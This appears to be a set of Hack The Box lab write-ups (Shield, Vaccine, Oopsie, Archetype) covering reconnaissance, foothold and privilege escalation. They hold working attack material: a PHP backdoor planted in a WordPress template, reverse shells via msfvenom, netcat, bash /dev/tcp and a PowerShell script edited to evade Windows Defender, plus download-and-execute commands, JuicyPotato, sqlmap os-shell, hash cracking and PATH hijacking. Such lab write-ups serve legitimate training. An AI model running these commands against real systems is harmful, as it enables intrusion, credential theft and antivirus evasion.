Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — — -
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Foothold Hack

So with that issue out the way I decided to log in to WordPress and poke around. I have managed to get a reverse shell before by editing the 404 PHP template and sticking a PHP reverse shell in there. In order to trigger it you just need to visit a page that doesn’t exist. Well no such luck on this machine, there is no 404 template. I tried a few other pages with PHP reverse shells but didn’t get anywhere. After this it was getting late so I gave up for the night.

The following day was much more productive. I edited the Single Post single.php file and stuck the simple-backdoor.php hack in there.

<! — Simple PHP backdoor by DK ( →
echo “<pre>”;
$cmd = ($_REQUEST[‘cmd’]);
echo “</pre>”;
<! — 2006 →

This script is awesome as it allows you to execute commands through the cmd parameter. With that saved to the single.php file it was time to test whether it worked. By calling the following URL it was possible to list the files in the directory where the script was being executed from.

Editing single.php with PHP backdoor

The following command was used to test wether the backdoor was working.
Payload directory listing

Now that we have command execution it is time to get on to the box via a reverse shell. In order to do this I created a reverse shell executable using MSFVenom.

sudo msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1337 -f exe -e x86/shikata_ga_nai -i 9 -o reverse.exe

With the hack created, I started a Python webserver that the Shield machine could connect too and download it. By pasting the following URL in the browser with the additional cmd parameter commands, the machine downloads and saves the reverse shell payload locally.

Python webserver -c “(New-Object Net.Webclient).DownloadFile(‘','C:\inetpub\wwwroot\wordpress\wp-content\themes\highlight\reverse.exe')"

With the file downloaded on to the server, we need to set up our netcat listener.

sudo nc -lvp 1337

Now time to get the reverse.exe file from the webserver.

Privilege Escalation Hack

Bingo we have access to the box, what now? There is lots of tools out there that you can use to gather information about the host and look for potential privilege escalation paths. One such tool is winPEAS. I won’t go into the details of finding the escalation path but it turns out I needed to use Juicy Potato hack. This part of the machine was an absolute nightmare, no matter what Class ID I used, the hack failed. Well one machine reset later and pulling the first CLSID from the list found here and I had a shell back to my host with system.

In order to do this I first downloaded and uploaded JuicyPotato to the system using the same method as the reverse.exe payload. I also did the same with nc.exe. I then created a batch file with the following payload inside.

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 1111 > shell.bat

Once that was in place it was time to run JuicyPotato and invoke the shell.bat file to create a reverse shell back to my host. Make sure you have another listener running on your host ready to accept the connection.

jp.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\themes\highlight\shell.bat -l 9999 -t * -c {03ca98d6-ff5d-49b8-abc6–03dd84127020}

It was then possible to capture the root key via the newly created shell.

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
Shield has been pwned

Vaccine has been Pwned!

What’s that you say? You don’t know where to begin when trying to hack something? Well, my old chum I’ve got your back. If you haven’t already done so then go back and check my other blog posts about Archetype and Oopsie. So provided you have permission to hack the target you want to hack and that the rules of engagement have been agreed upon; you start by scanning the box. There are many security tools that can scan a host for vulnerabilities. If you want something quick and easy then check out Nessus, however Nmap is an essential tool that everyone should learn.


So connect to the VPN, spin up the box and Nmap the heck out of it.

Sudo nmap -sC -sV -O -p0-
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu)

As you can see from the results, port 21 FTP (File Transfer Protocol), port 22 (Secure Shell) and port 80 (HTTP/Web Server) are exposed (not like that). The first thing I checked was whether FTP allowed Anonymous access, it didn’t. I then checked the website, but it required a login. However, after performing some post exploitation investigation on the previous box Oopsie, I found the FTP credentials ftpuser / [email protected]

★]$ ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( ftpuser
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r — r — 1 0 0 2533 Feb 03 2020
226 Directory send OK

Huzzah! The credentials worked and what’s that? A file called I needed to take a look at the contents of that zip file so I downloaded it using the get command. Once the zip file was downloaded, I tried to unzip but it promoted me for a password. The FTP password didn’t work neither did any of the passwords from the previous boxes. Luckily a tool exists that can be used to hack or crack zip file passwords. Zip2john is a tool that creates a hash from a zip file that can then be cracked using johntheripper.

─[]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ zip2john > hash.txt
─[]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ cat hash.txt$pkzip2$2*2*1*0*8*24*3a41*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b8f4b225aa15c4ffda8fe72f60a82*2*0*3da*cca*1b1ccd6a*504*43*8*3da*1b1c*989a*22290dc3505e51d341f31925a7ffefc181ef9f66d8d25e53c82afc7c1598fbc3fff28a17ba9d8cec9a52d66a11ac103f257e14885793fe01e26238915796640e8936073177d3e6e28915f5abf20fb2fb2354cf3b7744be3e7a0a9a798bd40b63dc00c2ceaef81beb5d3c2b94e588c58725a07fe4ef86c990872b652b3dae89b2fff1f127142c95a5c3452b997e3312db40aee19b120b85b90f8a8828a13dd114f3401142d4bb6b4e369e308cc81c26912c3d673dc23a15920764f108ed151ebc3648932f1e8befd9554b9c904f6e6f19cbded8e1cac4e48a5be2b250ddfe42f7261444fbed8f86d207578c61c45fb2f48d7984ef7dcf88ed3885aaa12b943be3682b7df461842e3566700298efad66607052bd59c0e861a7672356729e81dc326ef431c4f3a3cdaf784c15fa7eea73adf02d9272e5c35a5d934b859133082a9f0e74d31243e81b72b45ef3074c0b2a676f409ad5aad7efb32971e68adbbb4d34ed681ad638947f35f43bb33217f71cbb0ec9f876ea75c299800bd36ec81017a4938c86fc7dbe2d412ccf032a3dc98f53e22e066defeb32f00a6f91ce9119da438a327d0e6b990eec23ea820fa24d3ed2dc2a7a56e4b21f8599cc75d00a42f02c653f9168249747832500bfd5828eae19a68b84da170d2a55abeb8430d0d77e6469b89da8e0d49bb24dbfc88f27258be9cf0f7fd531a0e980b6defe1f725e55538128fe52d296b3119b7e4149da3716abac1acd841afcbf79474911196d8596f79862dea26f555c772bbd1d0601814cb0e5939ce6e4452182d23167a287c5a18464581baab1d5f7d5d58d8087b7d0ca8647481e2d4cb6bc2e63aa9bc8c5d4dfc51f9cd2a1ee12a6a44a6e64ac208365180c1fa02bf4f627d5ca5c817cc101ce689afe130e1e6682123635a6e524e2833335f3a44704de5300b8d196df50660bb4dbb7b5cb082ce78d79b4b38e8e738e26798d10502281bfed1a9bb6426bfc47ef62841079d41dbe4fd356f53afc211b04af58fe3978f0cf4b96a7a6fc7ded6e2fba800227b186ee598dbf0c14cbfa557056ca836d69e28262a060a201d005b3f2ce736caed814591e4ccde4e2ab6bdbd647b08e543b4b2a5b23bc17488464b2d0359602a45cc26e30cf166720c43d6b5a1fddcfd380a9c7240ea888638e12a4533cfee2c7040a2f293a888d6dcc0d77bf0a2270f765e5ad8bfcbb7e68762359e335dfd2a9563f1d1d9327eb39e68690a8740fc9748483ba64f1d923edfc2754fc020bbfae77d06e8c94fba2a02612c0787b60f0ee78d21a6305fb97ad04bb562db282c223667af8ad907466b88e7052072d6968acb7258fb8846da057b1448a2a9699ac0e5592e369fd6e87d677a1fe91c0d0155fd237bfd2dc49*$/pkzip2$,

Foothold Hack

Now that we generated the hash, it was time to hack or crack it using JohnTheRipper. In order to do this we point john at the hash and tell it which wordlist to use. As with all cracking a good place to start is rockyou.txt.

─[]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo john hash.txt — wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for joe:
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
741852963 (
1g 0:00:00:00 DONE (2021–09–07 19:02) 3.703g/s 15170p/s 15170c/s 15170C/s 123456..samanta
Use the “ — show” option to display all of the cracked passwords reliably
Session completed

Woop! looks like the password is 741852963. I tried to extract the zip file again using the password and it worked. The zip archived appeared to contain a CSS file (Cascading Stylesheet and an index.php file.

─[]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ unzip
[] index.php password:
inflating: index.php
inflating: style.css

Since the CSS file was only likely to contain website formatting, I looked at the index.php file first. Well what do you know, it looks like the index.php file had an MD5 password hash hardcoded in to the applications authentication mechanism. Easy pickings for even the most amateur hacker.

if(isset($_POST[‘username’]) && isset($_POST[‘password’])) {
if($_POST[‘username’] === ‘admin’ && md5($_POST[‘password’]) === “2cb42f8734ea607eefed3b70af13bbd3”) {
$_SESSION[‘login’] = “true”;
header(“Location: dashboard.php”);

MD5 Hash Crack

A lot of MD5 password hashes can be cracked online using websites like However, you may not always have internet access especially if you are testing a clients internal infrastructure which doesn’t have internet access. For that reason, I decided to use Hashcat. Hashcat is another cracking tool like JohnTheRipper.

─[]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo hashcat -m 0 md5hash.txt /usr/share/wordlists/rockyou.txthashcat (v6.1.1) starting…
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) — Platform #1 [The pocl project]
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU P7550 @ 2.26GHz, 3546/3610 MB (1024 MB allocatable), 2MCU
Session……….: hashcat
Status………..: Cracked
Hash.Name……..: MD5
Hash.Target……: 2cb42f8734ea607eefed3b70af13bbd3
Time.Started…..: Tue Sep 7 19:06:05 2021 (0 secs)
Time.Estimated…: Tue Sep 7 19:06:05 2021 (0 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 237.0 kH/s (0.49ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered……..: 1/1 (100.00%) Digests
Progress………: 100352/14344386 (0.70%)
Rejected………: 0/100352 (0.00%)
Restore.Point….: 98304/14344386 (0.69%)
Restore.Sub.#1…: Salt:0 Amplifier:0–1 Iteration:0–1
Candidates.#1….: Donovan -> pacers1

SQL Injection Hack

The hash was successfully cracked, and I must say I was disappointed to learn it was something as simple as qwerty789. Anyway, I was then able to login to the website with the newly cracked password. Upon log in, the website was very basic. The only functionality appeared to be a search box. This instantly made me think the vulnerability was going to be some form of SQL injection. As the website was behind an authentication mechanism, I needed a way to tell SQLMap to authenticate against the application. In order to do this inspected the website and nabbed my PHPSESSID cookie.


The first few attempts to scan the host with SQLMap were unsuccessful as no vulnerability was discovered. It had to be an SQL injection vulnerability because I had exhausted all other avenues of attack other than brute forcing the Secure Shell port. After a bit of research and a lot of reading on the HTB forums, it turns out that if another hacker exploits the SQL injection first then it won’t show as vulnerable when scanned again, not 100% sure why (weird). Anyway after requesting to reset the box a billion times I was finally able to see that the search parameter was vulnerable to SQL Injection.

─[]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo sqlmap -u ‘' — cookie=”PHPSESSID=s6j01lrmbrqh5no9pgjdg3ka2a”[*] starting @ 20:08:00 /2021–09–07/
[20:08:01] [INFO] testing connection to the target URL
[20:08:02] [INFO] testing if the target URL content is stable
[20:08:02] [INFO] target URL content is stable
[20:08:02] [INFO] testing if GET parameter ‘search’ is dynamic
[20:08:02] [INFO] GET parameter ‘search’ appears to be dynamic
[20:08:02] [INFO] heuristic (basic) test shows that GET parameter ‘search’ might be injectable (possible DBMS: ‘PostgreSQL’)
[20:08:09] [INFO] GET parameter ‘search’ appears to be ‘PostgreSQL > 8.1 stacked queries (comment)’ injectable 
[20:08:09] [INFO] testing ‘PostgreSQL > 8.1 AND time-based blind’
[20:08:12] [INFO] GET parameter ‘search’ appears to be ‘PostgreSQL > 8.1 AND time-based blind’ injectable 
[20:08:12] [INFO] testing ‘Generic UNION query (NULL) — 1 to 20 columns’
GET parameter ‘search’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] n

It was time to see whether we could get a shell on the box through SQLMap.

─[]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo sqlmap -u ‘' — cookie=”PHPSESSID=s6j01lrmbrqh5no9pgjdg3ka2a” — os-shell[*] starting @ 20:08:20 /2021–09–07/
[20:08:22] [INFO] resuming back-end DBMS ‘postgresql’
[20:08:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: search (GET)
[20:08:23] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[20:08:23] [INFO] fingerprinting the back-end DBMS operating system
[20:08:24] [INFO] the back-end DBMS operating system is Linux
[20:08:24] [INFO] testing if current user is DBA
[20:08:25] [INFO] retrieved: ‘1’
[20:08:25] [INFO] going to use ‘COPY … FROM PROGRAM …’ command execution
[20:08:25] [INFO] calling Linux OS shell. To quit type ‘x’ or ‘q’ and press ENTER

Brilliant, this gave us an os-shell. In order to upgrade it to a full shell I needed to create a netcat listener and run a command on the server to get it to connect back to my host. First I created the netcat listener.

─[]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo nc -lvp 1234

Then I ran the command on the target server.

os-shell> bash -c ‘bash -i >& /dev/tcp/ 0>&1

The command worked and the target server connected by to my host netcat listener. inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 38336
bash: cannot set terminal process group (1502): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/var/lib/postgresql/11/main$ whoami

Privilege Escalation Hack

Now that I had access to the server it was time to perform some further investigation. I checked the history and then started looking through the website files. I found one file called dashboard.php.

[email protected]:/var/lib/postgresql/11/main$ cat /var/www/html/dashboard.php
if($_SESSION[‘login’] !== “true”) {
header(“Location: index.php”);
try {
$conn = pg_connect(“host=localhost port=5432 dbname=carsdb user=postgres [email protected]!”);}

Bingo, we found a PHP database connection string with the postgres users password. I was then able to use the password to see what the postgres user had permissions to run.

[email protected]:/var/lib/postgresql/11/main$ sudo -l
[sudo] password for postgres: [email protected]!
Matching Defaults entries for postgres on vaccine:
env_reset, mail_badpass,
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

It appeared as that the postgres user had the ability to edit the pg_hba.conf configuration file using the vi tool. This was great news as vi has a built-in terminal that allows you to execute commands. After running the /bin/vi /etc/postgresql/11/main/pg_hba.conf command you can press escape and then type :!/bin/bash. This drop you in to a root shell where you can snag the root.txt file. There is no user.txt file on this target.

[email protected]:/var/lib/postgresql/11/main# cat /root/root.txt
cat /root/root.txt
Vaccine has been Pwned!

Oopsie has been Pwned!

Hello again, it’s time for another Hack The Box adventure as we take on Oopsie.


As always, I started by spinning up the target host and connecting to the VPN. Once connected I ran an Nmap scan to see what services were availible.

sudo nmap -sC -sV -O -p0-
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

The Nmap scan showed that only port 22 (Secure Shell) and port 80 (HTTP) were open. As there wasn’t much point trying to hack the SSH login via brute force (and as it isn’t a preferred method of exploiting a box) I started by browsing the website. The website was fairly basic and at first glance didn’t offer much.

A picture of the megacorp automotive website we want to hack
MegaCorp Automotive Website

There are many tools to crawl/spider a website such as dirb and gobuster but on this occasion I used Burp Suite. Using Burp Suite. Burp Suite is a web application security analysis or hacking tool. I turned off intercept and loaded the website in the built in Burp Browser (Chromimum).

A picture of intercepting the request from the application we want to hack
Burp Suite Browser

Burp has a built in spidering/crawling tool that will search through the contents of the web page. The application appeared to have a login url at the following extension.

Crawling the rest of the website didn’t appear to reveal any other sensitive directories or information. There was a login page but no credentials. We could have tried to hack the login page using a brute force attack with intruder but first lets try the credentials we found on the previous box Archetype.

BINGO, the MEGACORP_4dm1n!! password from the Archetype box history worked. The first thing I noticed when logged in was that there was an upload page. Unfortunately it’s never that simple. Visiting the upload page returned an error that I needed to be super admin. Looking around the site a bit more revealed some interesting information on the Repair Management System page.

A picture of the repair management system we need to hack
MegaCorp Automotive Repair Management System

The admin user appeared to have an “access ID”. I wanted to investigate this “access ID” further so I captured the request using Burp intercept and noticed that when viewing the account page, there was an $id paramter.

A picture showing the get request of the parameter we want to hack
Burp Request Captured

I sent this request to Burp Intruder and cleared the payloads. Once the payloads were cleared I added a payload to the value 1 in the $id parameter. I then used seq on linux to generate a payload list.

seq 1 100

I then copied and pasted the results in the payload section of intruder. There was one final option to configure before moving forward. In the options tab there is setting to follow redirections and to process cookies in redirections. Both of those needed to be ticked in order to launch the hack properly.

A picture showing the payload settings that we are using for the hack
Redirection Options

Once the settings were in place, I launched the hack. One tip for intruder attacks is to sort the results by the response length. Most of the time you will find that the response length is the same. However, if there is something interesting then the length of the response will likely be different. BINGO, the 30th request contained the information I needed. It looks like the super admin id was 30 and the Access ID 86575.

An image showing the super admin user that we are trying to hack
Super Admin Intercepted

I then turned intercept back on and made a request to the upload page. Burp suite intercepted the response and allowed me to edit it before sending the response to the server. I modified the Access ID value to that of the super admin and forwarded the request. The request was accepted by the server and I was allowed to access the upload page.

Foothold Hack

I used this PHP reverse shell script and modified it with my IP address and desired port. Next I needed to upload it to the website making sure to modify the Access ID value to the super admin Access ID when submitting the payload. I then set up my netcat listener.

sudo nc -lvp 1234

Once the listener was running it was time to find out where the script was uploaded to. As I said previously, there are many tools to do this including dirbuster and gobuster but in this instance, burp had already found the uploads directory. Using cURL I called the PHP script to trigger the reverse shell connection back to my machine. You could also visit the script directly in your browser to trigger it.


I checked the history and didn’t find anything useful so I then listed out the contents of the home directory and found the user robert. I was able to read the contents of the user roberts home directory including the user.txt flag.

$ whoami
$ ls home
$ ls home/robert
$ cat /home/robert/user.txt

After getting the user.txt file I decided to poke around on the server a bit more. I thought it best to check the web directory to see if there was anything I missed. As it turns out there was a db.php file which contained a username and password.

$ ls /var/www/html/cdn-cgi/login
admin.php db.php index.php script.js
$ cat /var/www/html/cdn-cgi/login/db.php
$conn = mysqli_connect(‘localhost’,’robert’,’M3g4C0rpUs3r!’,’garage’);

Privilege Escalation Hack

This appeared to be the password for the robert user so I decided to switch to the robert user and see what he had permission to run by using the id command.

[email protected]:/$ id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)

robert had access to an interesting file called bugtracker. This was likely going to be the method of priveledge escalation so I decided to check it out. Using the tool strings on the bugtracker file it became evident that there was a clear path to privilege escalation.

[email protected]:/$ strings /usr/bin/bugtracker
— — — — — — — — —
: EV Bug Tracker :
— — — — — — — — —
Provide Bug ID:
— — — — — — — -
cat /root/reports/

The file was calling the cat tool without the full path. This meant we could change our PATH environmental variable and make the cat tool to do something else, then when the script runs it will execute whatever we have put inside our newly created cat file. In this instance we created a new cat file in /tmp that when ran would spawn a shell.

export PATH=/tmp:$PATH
cd /tmp/
echo ‘/bin/sh’ > cat
chmod +x cat

Then when we run /usr/bin/bugtracker we are dropped in to a root shell where we can capture the root.txt file.

cat /root/root.txt
A picture showing the box we wanted to hack has been pwned!
Oopsie has been Pwned!

Archetype has been Pwned!


Today we’re going to be hacking in to the Hack The Box machine Archetype. This machine is one of the Starting Point machines that I will be hacking my way through. Ok let’s begin, Once you have spun up the box and connected to the VPN it’s time to get scanning. I tend to run nmap with the following flags;

sudo nmap -sC -sV -O -p0-

This will scan all ports and check for the service version, the operating system version and will run any “safe scripts” against the discovered services. It’s not always a good idea to run the vulnerability script but on this occasion I did. The results are shown below.

135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
| smb-vuln-ms08–067: 
| IDs: CVE:CVE-2008–4250

Based on the results I initially went after the ms08–67 vulnerability. I used metasploit to try and hack it but alas, no such luck. There was a problem with the language detection on the remote host so the exploit didn’t work.

The next service I went after was the Server Message Block protocol. The tool smbclient can be used to list the shared directories being served by the SMB service.

smbclient -L
Sharename Type Comment
— — — — — — — — — — - - - - - - - - -
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share

Based on the results from smbclient it was evident that the backups directory could be mounted.

smclient \\\\\\backups

The backup directory contained a file called prod.dtsConfig. It was possible to download this file and view the contents. The file appeared to be a configuration file and contained the password of the ARCHETYPE\sql_svc MSSQL user.

<DTSConfigurationFileInfo GeneratedBy=”…” GeneratedFromPackageName=”…” GeneratedFromPackageID=”…” GeneratedDate=”20.1.2019 10:01:34"/>
<Configuration ConfiguredType=”Property” Path=”\Package.Connections[Destination].Properties[ConnectionString]” ValueType=”String”>
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>

Foothold Hack

Ok, time to start hacking. It was then possible to connect to the MSSQL service using the credentials provided in the prod.dtsConfig file. In order to connect to the MSSQL service I used the Impacket tool

python ARCHETYPE/[email protected] -windows-auth

After providing the password I was logged on to the server. In order to check whether we had sysadmin level privledges I ran the following command.


It appeared that I had sysadmin level privileges so it was time to get a reverse shell set up so I could connect to the box. In order to do this I pinched the following Powershell script and modified it with my IP address and the port I wanted the server to connect to me on.

$client = New-Object System.Net.Sockets.TCPClient(“”,4000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “#”;$sendbyte =

It is worth noting that I had a few issues with the following part of the script being picked up by Windows Defender. However after some google fu I disovered the particular paramter it didn’t like. It appears that Windows Defender doesn’t like “PS “ + (pwd).Path + “>. It was also quite particular about the spacing within the “#”; part of the script.

sendback + “PS “ + (pwd).Path + “> “;$sendbyte =

With the script edited and my IP address and port added, it was time to host the script so that the remote server could download and execute it. In order to do this I used the HTTP Python module to serve the file locally.

sudo python3 -m http.server 80

With the file being served on my local machine I had to set up a listener in order to connect the reverse connection from the server to my local machine. In order to do this I used the netcat tool.

sudo nc -lvp 4000

Privilege Escalation Hack

Then on the remote server I ran a command to tell the server to download and execute the script being hosted on my local machine.

xp_cmdshell “powershell “IEX (New-Object Net.WebClient).DownloadString(\”\");"

This created a reverse shell connection back to my local machine. It was then possible to browse the local file system and run commands as though I were logged on to it locally. The first thing I wanted to check and that I recommend checking is the history. It may contain useful information left by the box creator or by other hackers.

#type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!

BINGO, there was a valid set of credentials in the history. It was then possible to connect to the server using the Impacket tool.

sudo python /usr/share/doc/python3-impacket/examples/ [email protected]

Once logged in as administrator it was possible to recover all the keys required to complete the box. Hacking is so much fun.

C:\Windows\system32>type C:\Users\sql_svc\Desktop\user.txt
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
Hack The Box Archetype has been pwned!
Hack The Box Archetype has been pwned!

If you liked this post then check out some of my other ones. I have done write-ups for  ArchetypeOopsie, VaccineShieldPathfinder and Included.